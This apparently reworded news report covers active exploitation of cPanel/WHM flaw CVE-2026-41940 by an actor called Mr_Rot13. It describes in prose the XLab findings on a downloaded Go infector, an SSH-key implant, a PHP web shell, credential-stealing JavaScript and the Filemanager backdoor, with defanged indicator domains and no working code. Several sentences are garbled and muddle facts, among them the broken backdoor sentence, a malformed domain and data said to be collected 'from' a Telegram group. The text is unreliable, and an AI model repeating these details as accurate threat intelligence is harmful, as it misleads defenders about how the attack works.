cPanel CVE-2026-41940 Under Active Exploit to Install Filemanager Backdoor
A malicious actor named Mr_Rot13 is said to be responsible for exploiting a recently disclosed critical cPanel flaw to use a codenamed backdoor. File manager in vulnerable areas.
The attack exploits CVE-2026-41940, a vulnerability affecting cPanel and WebHost Manager (WHM) that could result in authentication bypass and allow remote attackers to gain maximum control of the control panel.
According to a new report from QiAnXin XLab, this security flaw was exploited by a number of malicious actors shortly after its public disclosure late last month, resulting in malicious behavior such as cryptocurrency mining, ransomware, botnet propagation, and backdoor installation.
“Monitoring data shows that more than 2,000 attacker source IPs around the world are currently involved in automated attacks and cybercriminal activities targeting this vulnerability,” XLab researchers said. “These IPs are distributed in many regions around the world, mainly from Germany, the United States, Brazil, the Netherlands, and other regions.”
Further analysis of ongoing exploit activity revealed a shell script that uses wget or curl to download a Go-based infector from a remote server (“cp.dene.[de[.]com”) designed to plant a vulnerable cPanel system with an SSH public key for continued access, as well as drop a PHP web shell that facilitates file upload/download and remote command execution.
The web shell is then used to inject JavaScript code to use a customized login page to steal login credentials and inject them into the attacker’s controlled system encoded using the ROT13 cipher (“wrned[.]com”). Once the information is passed, the attack chain culminates with the installation of a cross-platform backdoor capable of infecting Windows, macOS, and Linux systems.
The infector is also equipped to collect sensitive information from the vulnerable host, including bash history, SSH data, device information, database passwords, and virtual cPanel aliases (aka valiases), from a 3-member Telegram group created by a user named “0xWR.”
In the infection thread analyzed by XLab, Filemanager is delivered via a shell script downloaded from “wpsock[.]com” domain. The backdoor supports file management, remote command execution, and shell operations.
There are signs that the most intimidating actor in the project has been working quietly in the shadows for years. This assessment is based on the fact that a command and control domain (C2) embedded in JavaScript code was used in a PHP-based backdoor (“helper.php”) that was uploaded to the VirusTotal platform in April 2022. The domain was first registered in October 2020.
“In the six years from 2020 until now, the detection rate of samples related to Mr_Rot13 and infrastructure in all security products has remained very low,” XLab said.
